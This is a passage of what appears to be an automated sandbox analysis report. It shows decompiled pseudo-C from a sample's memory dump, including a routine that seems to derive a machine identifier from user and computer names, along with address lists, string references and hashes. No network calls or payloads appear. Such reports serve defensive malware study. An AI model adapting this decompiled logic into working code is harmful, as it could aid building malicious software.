					_t224 = _t224 + 1;
					_t247 = _t247 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}

0x0090e685
0x0090e68c
0x0090e693
0x0090e69a
0x0090e6a1
0x0090e6a8
0x0090e6af
0x0090e6b3
0x0090e6b7
0x0090e6bb
0x0090e6bf
0x0090e6c3
0x0090e6c7
0x0090e6d1
0x0090e6db
0x0090e6e5
0x0090e6ef
0x0090e6f9
0x0090e703
0x0090e70d
0x0090e717
0x0090e721
0x0090e72b
0x0090e735
0x0090e73f
0x0090e749
0x0090e753
0x0090e75d
0x0090e767
0x0090e771
0x0090e77b
0x0090e785
0x0090e78f
0x0090e799
0x0090e7a3
0x0090e7ad
0x0090e7b7
0x0090e7c1
0x0090e7cb
0x0090e7d5
0x0090e7df
0x0090e7e9
0x0090e7f3
0x0090e7fd
0x0090e807
0x0090e811
0x0090e81b
0x0090e825
0x0090e82f
0x0090e839
0x0090e843
0x0090e84d
0x0090e857
0x0090e861
0x0090e86b
0x0090e875
0x0090e87f
0x0090e889
0x0090e893
0x0090e89d
0x0090e8a7
0x0090e8b1
0x0090e8bb
0x0090e8c5
0x0090e8cf
0x0090e8d9
0x0090e8e3
0x0090e8ed
0x0090e8f7
0x0090e901
0x0090e90b
0x0090e915
0x0090e91f
0x0090e929
0x0090e933
0x0090e93d
0x0090e947
0x0090e951
0x0090e95b
0x0090e965
0x0090e968
0x0090e96c
0x0090e96e
0x0090e972
0x0090e97c
0x0090e986
0x0090e990
0x0090e99a
0x0090e9a4
0x0090e9ae
0x0090e9b8
0x0090e9c2
0x0090e9cc
0x0090e9d6
0x0090e9e0
0x0090e9ea
0x0090e9f4
0x0090e9fe
0x0090ea08
0x0090ea12
0x0090ea1c
0x0090ea23
0x0090ea2a
0x0090ea31
0x0090ea38
0x0090ea3f
0x0090ea46
0x0090ea4d
0x0090ea54
0x0090ea5b
0x0090ea62
0x0090ea69
0x0090ec57
0x0090ec5a
0x0090ec60
0x0090ec63
0x0090ec76
0x0090ec6f
0x0090ec6f
0x00000000
0x0090ec6f
0x0090ec63
0x0090ea70
0x0090ea7f
0x0090ea82
0x0090ea86
0x0090ea89
0x0090ec06
0x0090ec0a
0x0090ec44
0x0090ec47
0x0090ec10
0x0090ec13
0x0090ec18
0x0090ec1c
0x0090ec21
0x0090ec28
0x0090ec28
0x0090ec21
0x0090ec2a
0x0090ec2a
0x0090ec48
0x0090ec49
0x0090ec49
0x0090ec50
0x00000000
0x00000000
0x00000000
0x0090ec50
0x0090ea8f
0x0090ea92
0x0090ea95
0x0090ea95
0x0090ea99
0x0090ea9e
0x0090ea9f
0x0090eaa3
0x0090eaa6
0x0090eaa9
0x0090eaae
0x0090eab3
0x00000000
0x00000000
0x0090eab5
0x0090eab9
0x00000000
0x00000000
0x0090eabb
0x0090eac3
0x0090ebce
0x0090ebce
0x0090ebd2
0x0090ebd5
0x0090ebdc
0x0090ebdd
0x0090ebe0
0x0090ebe5
0x0090ebe7
0x0090ebe8
0x0090ebeb
0x0090ebee
0x0090ebf3
0x0090ebf8
0x00000000
0x00000000
0x0090ebfa
0x0090ec01
0x00000000
0x00000000
0x0090ec03
0x00000000
0x0090ec03
0x0090ec37
0x0090ec3a
0x0090ec3b
0x00000000
0x0090ec3b
0x0090eac9
0x0090eac9
0x0090eacd
0x0090ead2
0x0090eb83
0x0090eb83
0x0090eb87
0x0090eb89
0x0090eb98
0x0090eb98
0x0090eb9c
0x00000000
0x00000000
0x0090eb8f
0x0090eba1
0x0090eba3
0x00000000
0x00000000
0x0090eba5
0x0090eba6
0x0090ebaa
0x0090ebab
0x0090ebb4
0x0090ebb9
0x0090ebc1
0x0090ebc4
0x0090ebc7
0x0090ebc8
0x00000000
0x0090ebc8
0x0090eb91
0x0090eb95
0x00000000
0x00000000
0x0090eb97
0x0090eb97
0x0090eb9e
0x00000000
0x0090eae1
0x0090eae1
0x0090eae3
0x0090eb09
0x0090eb09
0x0090eb0d
0x00000000
0x00000000
0x0090eb00
0x0090eb7e
0x0090eb13
0x0090eb17
0x00000000
0x00000000
0x0090eb25
0x0090eb2d
0x0090eb32
0x0090eb36
0x0090eb3b
0x0090eb46
0x0090eb55
0x0090eb5d
0x0090eb5e
0x0090eb62
0x0090eb6e
0x0090eb74
0x0090eb75
0x00000000
0x0090eb75
0x0090eb02
0x0090eb06
0x00000000
0x00000000
0x0090eb08
0x0090eb08
0x0090eb0f
0x00000000
0x0090eb0f
0x0090ead2
0x0090eaee
0x0090eaf4
0x0090eaf5
0x00000000
0x0090eaf5
0x00000000

Strings

(BA, xrefs: 0090EA12
h@A, xrefs: 0090E7D5
AA, xrefs: 0090E9C2
BA, xrefs: 0090EA08
xBA, xrefs: 0090EA5B
HAA, xrefs: 0090E8ED
@AA, xrefs: 0090E8E3
`@A, xrefs: 0090E7CB
h?A, xrefs: 0090E685
@A, xrefs: 0090E875
?A, xrefs: 0090E72B
@A, xrefs: 0090E77B
(@A, xrefs: 0090E785
p@A, xrefs: 0090E7DF
@@A, xrefs: 0090E7A3
H@A, xrefs: 0090E7AD
x?A, xrefs: 0090E69A
HBA, xrefs: 0090EA31
xAA, xrefs: 0090E929
XAA, xrefs: 0090E901
`BA, xrefs: 0090EA46
t?A, xrefs: 0090E693
hAA, xrefs: 0090E915
pBA, xrefs: 0090EA54
P@A, xrefs: 0090E7B7
x@A, xrefs: 0090E7E9
8BA, xrefs: 0090EA23
X@A, xrefs: 0090E7C1
AA, xrefs: 0090E8BB
0AA, xrefs: 0090E8CF
(AA, xrefs: 0090E8C5
8@A, xrefs: 0090E799
@BA, xrefs: 0090EA2A
8AA, xrefs: 0090E8D9
PAA, xrefs: 0090E8F7
XBA, xrefs: 0090EA3F
hBA, xrefs: 0090EA4D
?A, xrefs: 0090E735
0BA, xrefs: 0090EA1C
@A, xrefs: 0090E86B
p?A, xrefs: 0090E68C
`AA, xrefs: 0090E90B
pAA, xrefs: 0090E91F
0@A, xrefs: 0090E78F
AA, xrefs: 0090E9B8
PBA, xrefs: 0090EA38

Memory Dump Source

Source File: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000D.00000002.599319686.00000000008A0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.599927792.0000000000922000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
API String ID: 0-2473593039
Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
Instruction ID: 3bb6acba4060b9034276944aad87c6a005af57fdc64999bb50d7868087c7fd23
Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
Instruction Fuzzy Hash: 07F159B0900269DFDB21CF95D8487DEBFB4AB96308F5085CAD5593B241C3B90AC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00901478, Relevance: 10.1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00901478(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t57;
				void* _t58;
				void* _t65;
				void* _t68;
				void* _t71;
				void* _t84;
				signed int _t87;
				void* _t89;
				signed int _t93;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t111;

				_t111 = __fp0;
				_t89 = __ecx;
				_t100 = _t102 - 0x6c;
				_t103 = _t102 - 0x474;
				 *((intOrPtr*)(_t100 + 0x4c)) = 0x4125f8;
				 *((intOrPtr*)(_t100 + 0x50)) = 0x412608;
				 *((intOrPtr*)(_t100 + 0x54)) = 0x412618;
				 *((intOrPtr*)(_t100 + 0x58)) = 0x41262c;
				 *((intOrPtr*)(_t100 + 0x1c)) = 0x41263c;
				 *((intOrPtr*)(_t100 + 0x20)) = 0x412648;
				 *((intOrPtr*)(_t100 + 0x24)) = 0x412654;
				 *((intOrPtr*)(_t100 + 0x28)) = 0x412664;
				 *((intOrPtr*)(_t100 + 0x3c)) = 0x412670;
				 *((intOrPtr*)(_t100 + 0x40)) = 0x412680;
				 *((intOrPtr*)(_t100 + 0x44)) = 0x412690;
				 *((intOrPtr*)(_t100 + 0x48)) = 0x4126a4;
				 *((intOrPtr*)(_t100 + 0x2c)) = 0x4126b4;
				 *((intOrPtr*)(_t100 + 0x30)) = 0x4126c0;
				 *((intOrPtr*)(_t100 + 0x34)) = 0x4126cc;
				 *((intOrPtr*)(_t100 + 0x38)) = 0x4126dc;
				 *((intOrPtr*)(_t100 + 0x5c)) = 0x4126e8;
				 *((intOrPtr*)(_t100 + 0x60)) = 0x412700;
				 *((intOrPtr*)(_t100 + 0x64)) = 0x412718;
				 *((intOrPtr*)(_t100 + 0x68)) = 0x412734;
				_t87 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t100 - 0x63);
					 *((char*)(_t100 - 0x64)) = 0;
					L009103F4();
					_push(_t100 - 0x64);
					_t93 = _t87 << 2;
					_push( *((intOrPtr*)(_t100 + _t93 + 0x4c)));
					_push( *((intOrPtr*)(_t100 + 0x78)));
					_t57 = 0x7f;
					_t58 = E0090D9F2(_t57, _t89);
					_t103 = _t103 + 0x18;
					if(_t58 == 0) {
						E0090104A(_t100 - 0x408);
						_push(_t100 - 0x64);
						_push(_t100 - 0x1f4);
						L009103FA();
						_t97 =  *((intOrPtr*)(_t100 + 0x78));
						 *((intOrPtr*)(_t100 - 0x37c)) =  *((intOrPtr*)(_t100 + 0x7c));
						_t34 = _t87 + 1; // 0x1
						 *((intOrPtr*)(_t100 - 0x1f8)) = _t34;
						_push(_t100 - 0x2f8);
						_push( *((intOrPtr*)(_t100 + _t93 + 0x1c)));
						_push(_t97);
						_t65 = 0x7f;
						E0090D9F2(_t65, _t89);
						_push(_t100 - 0x3fc);
						_push(0x41274c);
						_push(_t97);
						_t68 = 0x7f;
						E0090D9F2(_t68, _t89);
						_push(_t100 - 0x378);
						_push(0x412760);
						_push(_t97);
						_t71 = 0x7f;
						E0090D9F2(_t71, _t89);
						_t105 = _t103 + 0x2c;
						if(_t87 != 3) {
							_push(_t100 - 0x278);
							_push(0x412664);
							_push(_t97);
							_t84 = 0x7f;
							E0090D9F2(_t84, _t89);
							_t105 = _t105 + 0xc;
						}
						E0090D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x2c)), _t100 - 0x74);
						E0090D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x5c)), _t100 - 0x70);
						_t103 = _t105 + 0x18;
						_t98 =  *((intOrPtr*)(_t100 + 0x74));
						E009012DE(_t98, _t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x3c)), _t100 - 0x174, 0);
						_push(_t98 + 0xa9c);
						_push(_t100 - 0xf4);
						L009103FA();
						_pop(_t89);
						_t58 = E00901279(_t100 - 0x408, _t111, _t98);
					}
					_t87 = _t87 + 1;
				} while (_t87 < 4);
				return _t58;
			}

0x00901478
0x00901478
0x00901479
0x0090147d
0x00901486
0x0090148d
0x00901494
0x0090149b
0x009014a2
0x009014a9
0x009014b0
0x009014b7
0x009014be
0x009014c5
0x009014cc
0x009014d3
0x009014da
0x009014e1
0x009014e8
0x009014ef
0x009014f6
0x009014fd
0x00901504
0x0090150b
0x00901512
0x00901514
0x00901514
0x00901519
0x0090151b
0x0090151c
0x00901520
0x00901528
0x0090152b
0x0090152e
0x00901532
0x00901537
0x00901538
0x0090153d
0x00901542
0x0090154e
0x00901556
0x0090155d
0x0090155e
0x00901566
0x00901569
0x0090156f
0x00901572
0x0090157e
0x0090157f
0x00901583
0x00901586
0x00901587
0x00901592
0x00901593
0x00901598
0x0090159b
0x0090159c
0x009015a7
0x009015a8
0x009015ad
0x009015b0
0x009015b1
0x009015b6
0x009015bc
0x009015c4
0x009015c5
0x009015ca
0x009015cd
0x009015ce
0x009015d3
0x009015d3
0x009015df
0x009015ed
0x009015f2
0x00901603
0x00901608
0x00901613
0x0090161a
0x0090161b
0x00901621
0x00901629
0x00901629
0x0090162e
0x0090162f
0x0090163f

Strings

4'A, xrefs: 0090150B
,&A, xrefs: 0090149B
<&A, xrefs: 009014A2
T&A, xrefs: 009014B0
d&A, xrefs: 009014B7
&A, xrefs: 009014F6
p&A, xrefs: 009014BE
H&A, xrefs: 009014A9

Memory Dump Source

Source File: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000D.00000002.599319686.00000000008A0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.599927792.0000000000922000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
API String ID: 0-3237638986
Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
Instruction ID: 708fb846304e028678793b1e0ee56abb75a2e76e6beac4048ac576a4a79ccf59
Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
Instruction Fuzzy Hash: 05418FB290121CAFDB20DF90CD85ADE3BA8EF54304F104126F918DB191D7B99A99CF98

Uniqueness

Uniqueness Score: -1.00%

Function 009060BE, Relevance: 8.9, Strings: 7, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E009060BE(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v291;
				char _v292;
				char _v547;
				char _v548;
				char _v1058;
				char _v1060;
				char _v1570;
				char _v1572;
				char* _t81;
				char* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				signed int _t97;
				intOrPtr* _t102;
				signed short* _t103;
				intOrPtr _t106;
				void* _t107;

				_t85 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				L009103F4();
				_v548 = 0;
				L009103F4();
				_v1572 = 0;
				L009103F4();
				_v1060 = 0;
				L009103F4();
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
				_v24 = 0xff;
				 *0x412018( &_v548,  &_v24);
				_t102 =  *0x4120d0;
				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_t81 =  &_v292;
				_push(_t81);
				L009103B6();
				_v32 = _t81;
				_t82 =  &_v548;
				_push(_t82);
				L009103B6();
				_t106 = _v36;
				_v28 = _t82;
				_push(0x10);
				_push( &_v20);
				_push(_t106);
				L0091043C();
				_t84 = 0xba0da71d;
				if(_v28 > 0) {
					_t103 =  &_v1060;
					do {
						_t97 = _a4 & 0x80000003;
						if(_t97 < 0) {
							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t89 = ( *_t103 & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
						_a4 = _a4 + 1;
						_t103 =  &(_t103[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t85) {
					do {
						_t92 = _a4 & 0x80000003;
						if(_t92 < 0) {
							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
						_a4 = _a4 + 1;
						_t85 = _t85 + 1;
					} while (_t85 < _v32);
				}
				return _t84;
			}

0x009060cf
0x009060da
0x009060de
0x009060e2
0x009060e6
0x009060ea
0x009060ee
0x009060f2
0x009060f6
0x009060fa
0x009060fe
0x00906102
0x00906106
0x0090610a
0x0090610e
0x00906112
0x00906116
0x0090611a
0x00906120
0x0090612e
0x00906134
0x00906147
0x0090614e
0x0090615c
0x00906163
0x0090616e
0x0090617f
0x00906182
0x00906185
0x00906196
0x00906199
0x0090619f
0x009061b8
0x009061cd
0x009061cf
0x009061d5
0x009061d6
0x009061db
0x009061de
0x009061e4
0x009061e5
0x009061ea
0x009061ed
0x009061f0
0x009061f5
0x009061f6
0x009061f7
0x00906202
0x00906207
0x00906209
0x0090620f
0x00906212
0x00906218
0x0090621e
0x0090621e
0x00906222
0x00906225
0x0090622e
0x00906230
0x00906237
0x00906238
0x0090620f
0x00906240
0x00906242
0x00906245
0x0090624b
0x00906251
0x00906251
0x0090625a
0x0090625d
0x00906266
0x00906268
0x0090626b
0x0090626c
0x00906242
0x00906275

Strings

}, xrefs: 00906106
i, xrefs: 009060E6
5, xrefs: 00906102
H, xrefs: 00906116
b, xrefs: 009060EE
}, xrefs: 00906112
O, xrefs: 0090610A

Memory Dump Source

Source File: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000D.00000002.599319686.00000000008A0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.599927792.0000000000922000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 5$H$O$b$i$}$}
API String ID: 0-3760989150
Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
Instruction ID: 855595f7146013d7c14cd693645a112b2ccffb4df3e7ac4707b7d987f5a65d55
Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
Instruction Fuzzy Hash: 4D51E87180025DAEDB11CBA8CC40BEEBBBCEF89314F0442A9E555E7192D7749B85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00901642, Relevance: 8.9, Strings: 7, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00901642(void* __fp0) {
				void* __esi;
				void* _t65;
				signed int _t89;
				void* _t92;
				intOrPtr _t106;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t118;

				_t118 = __fp0;
				_t108 = _t110 - 0x70;
				_t111 = _t110 - 0x474;
				 *((intOrPtr*)(_t108 + 0x40)) = 0x412774;
				 *((intOrPtr*)(_t108 + 0x44)) = 0x412784;
				 *((intOrPtr*)(_t108 + 0x48)) = 0x412794;
				 *((intOrPtr*)(_t108 + 0x4c)) = 0x4127a4;
				 *((intOrPtr*)(_t108 + 0x50)) = 0x4127b4;
				 *((intOrPtr*)(_t108 + 0x54)) = 0x4127c0;
				 *((intOrPtr*)(_t108 + 0x58)) = 0x4127cc;
				 *((intOrPtr*)(_t108 + 0x5c)) = 0x4127d8;
				 *((intOrPtr*)(_t108 + 0x20)) = 0x41263c;
				 *((intOrPtr*)(_t108 + 0x24)) = 0x412648;
				 *((intOrPtr*)(_t108 + 0x28)) = 0x4127e4;
				 *((intOrPtr*)(_t108 + 0x2c)) = 0x412664;
				 *((intOrPtr*)(_t108 + 0x30)) = 0x4126b4;
				 *((intOrPtr*)(_t108 + 0x34)) = 0x4126c0;
				 *((intOrPtr*)(_t108 + 0x38)) = 0x4127f4;
				 *((intOrPtr*)(_t108 + 0x3c)) = 0x4126dc;
				 *((intOrPtr*)(_t108 + 0x60)) = 0x412800;
				 *((intOrPtr*)(_t108 + 0x64)) = 0x412810;
				 *((intOrPtr*)(_t108 + 0x68)) = 0x412820;
				 *((intOrPtr*)(_t108 + 0x6c)) = 0x412834;
				_t89 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t108 - 0x5f);
					 *((char*)(_t108 - 0x60)) = 0;
					L009103F4();
					_t111 = _t111 + 0xc;
					_t97 = _t89 << 2;
					_t65 = E00901819(_t108 - 0x60,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + (_t89 << 2) + 0x50)));
					if(_t65 != 0) {
						E0090104A(_t108 - 0x404);
						_push(_t108 - 0x60);
						_push(_t108 - 0x1f0);
						L009103FA();
						_pop(_t92);
						 *((intOrPtr*)(_t108 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x78)) + 0xb1c));
						_t37 = _t89 + 1; // 0x1
						 *((intOrPtr*)(_t108 - 0x1f4)) = _t37;
						E00901819(_t108 - 0x2f4,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x20)));
						E00901819(_t108 - 0x3f8,  *((intOrPtr*)(_t108 + 0x7c)), 0x412844);
						E00901819(_t108 - 0x374,  *((intOrPtr*)(_t108 + 0x7c)), 0x412854);
						if(_t89 != 3) {
							E00901819(_t108 - 0x274,  *((intOrPtr*)(_t108 + 0x7c)), 0x412664);
							E0090D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)), 0x4126dc, _t108 - 0x68);
							_t111 = _t111 + 0xc;
						}
						E0090D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x30)), _t108 - 0x70);
						E0090D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x60)), _t108 - 0x6c);
						_t106 =  *((intOrPtr*)(_t108 + 0x78));
						_t111 = _t111 + 0x18;
						E009012DE(_t106, _t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x40)), _t108 - 0x170, 1);
						_push(_t106 + 0xa9c);
						_push(_t108 - 0xf0);
						L009103FA();
						_t65 = E00901279(_t108 - 0x404, _t118, _t106);
					}
					_t89 = _t89 + 1;
				} while (_t89 < 4);
				return _t65;
			}

0x00901642
0x00901643
0x00901647
0x00901650
0x00901657
0x0090165e
0x00901665
0x0090166c
0x00901673
0x0090167a
0x00901681
0x00901688
0x0090168f
0x00901696
0x0090169d
0x009016a4
0x009016ab
0x009016b2
0x009016b9
0x009016c0
0x009016c7
0x009016ce
0x009016d5
0x009016dc
0x009016de
0x009016de
0x009016e3
0x009016e5
0x009016e6
0x009016ea
0x009016ef
0x009016f4
0x00901701
0x00901708
0x00901714
0x0090171c
0x00901723
0x00901724
0x00901733
0x00901738
0x00901741
0x0090174a
0x00901750
0x00901763
0x00901776
0x0090177e
0x0090178e
0x0090179f
0x009017a4
0x009017a4
0x009017b2
0x009017c2
0x009017c7
0x009017ca
0x009017df
0x009017ea
0x009017f1
0x009017f2
0x00901800
0x00901800
0x00901805
0x00901806
0x00901816

Strings

<&A, xrefs: 00901688
t'A, xrefs: 00901650
4(A, xrefs: 009016D5
'A, xrefs: 00901696
(A, xrefs: 009016CE
H&A, xrefs: 0090168F
d&A, xrefs: 0090169D

Memory Dump Source

Source File: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000D.00000002.599319686.00000000008A0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.599927792.0000000000922000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
API String ID: 0-2857912252
Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
Instruction ID: dbc2643e1e81e9b57d0288ea941f997941eeb8041f4db63f706aff6f4d57213e
Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
Instruction Fuzzy Hash: EE514AB190025D9FDF24DF60CD45ADD3BB8FF44308F10802AF928A6191D3B59AA9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00902E88, Relevance: 6.3, Strings: 5, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00902E88(intOrPtr* __edi, void* __eflags) {
				void* __esi;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t59;

				_t60 = __edi;
				E00907340(__edi, __eflags);
				 *((intOrPtr*)(__edi + 0x1d8)) = 0;
				 *((intOrPtr*)(__edi + 0x1cc)) = 0;
				 *((intOrPtr*)(__edi + 0x1d0)) = 0;
				 *((intOrPtr*)(__edi + 0x1d4)) = 0;
				_t5 = _t60 + 0x1e0; // 0x1e0
				_t49 = _t5;
				 *((intOrPtr*)(__edi + 0x1dc)) = 0x100;
				 *_t49 = 0x413754;
				 *((intOrPtr*)(_t49 + 0x10)) = 0;
				 *((intOrPtr*)(_t49 + 4)) = 0;
				 *((intOrPtr*)(_t49 + 8)) = 0;
				 *((intOrPtr*)(_t49 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t49 + 0xc)) = 0;
				 *_t49 = 0x413760;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x413758;
				_t13 = _t60 + 0x1f8; // 0x1f8
				_t50 = _t13;
				 *((intOrPtr*)(_t50 + 4)) = 0;
				 *((intOrPtr*)(_t50 + 8)) = 0;
				 *((intOrPtr*)(_t50 + 0xc)) = 0;
				 *((intOrPtr*)(_t50 + 0x10)) = 0;
				 *((intOrPtr*)(_t50 + 0x14)) = 0;
				 *((intOrPtr*)(_t50 + 0x18)) = 0;
				 *((intOrPtr*)(_t50 + 0x1c)) = 0;
				 *_t50 = 0;
				_t21 = _t60 + 0x630; // 0x630
				_t51 = _t21;
				 *((intOrPtr*)(_t51 + 8)) = 0x20;
				 *_t51 = 0;
				 *((intOrPtr*)(_t51 + 0xc)) = 0;
				 *((intOrPtr*)(_t51 + 4)) = 0;
				 *((char*)(__edi + 0x52a)) = 0;
				_t26 = _t60 + 0x64c; // 0x64c
				 *((intOrPtr*)(__edi + 0x640)) = 0x412e80;
				E00903549(_t26);
				 *((intOrPtr*)(__edi + 0x858)) = 0x413144;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x4130f0;
				_t30 = _t60 + 0x870; // 0x870
				_t53 = _t30;
				 *_t53 = 0x4130f0;
				_t31 = _t60 + 0x878; // 0x878
				_t59 = _t31;
				 *_t59 = 0x413144;
				 *_t53 = 0x412f34;
				_t32 = _t60 + 0x87c; // 0x87c
				_t54 = _t32;
				 *__edi = 0x412e98;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__edi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__edi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__edi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x412f30;
				 *_t59 = 0x412f38;
				_t38 = _t60 + 0x890; // 0x890
				 *_t54 = 0x413bd8;
				 *((intOrPtr*)(_t54 + 8)) = 0;
				 *((intOrPtr*)(_t54 + 0x10)) = 0;
				 *((intOrPtr*)(_t54 + 4)) = 0;
				 *((intOrPtr*)(_t54 + 0xc)) = 0;
				E00903549(_t38);
				 *((char*)(__edi + 0xb20)) = 0;
				 *((char*)(__edi + 0xc25)) = 0;
				 *((char*)(__edi + 0xd2a)) = 0;
				 *((char*)(__edi + 0xe2f)) = 0;
				 *((char*)(__edi + 0xa9c)) = 0;
				return __edi;
			}

0x00902e88
0x00902e8c
0x00902e93
0x00902e99
0x00902e9f
0x00902ea5
0x00902eab
0x00902eab
0x00902eb6
0x00902ebc
0x00902ec2
0x00902ec5
0x00902ec8
0x00902ecb
0x00902ece
0x00902ed1
0x00902ed7
0x00902ee1
0x00902ee1
0x00902ee7
0x00902eea
0x00902eed
0x00902ef0
0x00902ef3
0x00902ef6
0x00902ef9
0x00902efc
0x00902efe
0x00902efe
0x00902f04
0x00902f0b
0x00902f0d
0x00902f10
0x00902f13
0x00902f19
0x00902f1f
0x00902f29
0x00902f2e
0x00902f38
0x00902f42
0x00902f42
0x00902f48
0x00902f4e
0x00902f4e
0x00902f54
0x00902f5a
0x00902f60
0x00902f60
0x00902f66
0x00902f6c
0x00902f76
0x00902f80
0x00902f8a
0x00902f94
0x00902f9e
0x00902fa4
0x00902faa
0x00902fb0
0x00902fb3
0x00902fb6
0x00902fb9
0x00902fbc
0x00902fc1
0x00902fc7
0x00902fcd
0x00902fd3
0x00902fda
0x00902fe3

Strings

`7A, xrefs: 00902F76
,/A, xrefs: 00902F8A
$/A, xrefs: 00902F80
0/A, xrefs: 00902F94
X7A, xrefs: 00902ED7

Memory Dump Source

Source File: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000D.00000002.599319686.00000000008A0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.599927792.0000000000922000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/A$,/A$0/A$X7A$`7A
API String ID: 0-851144607
Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
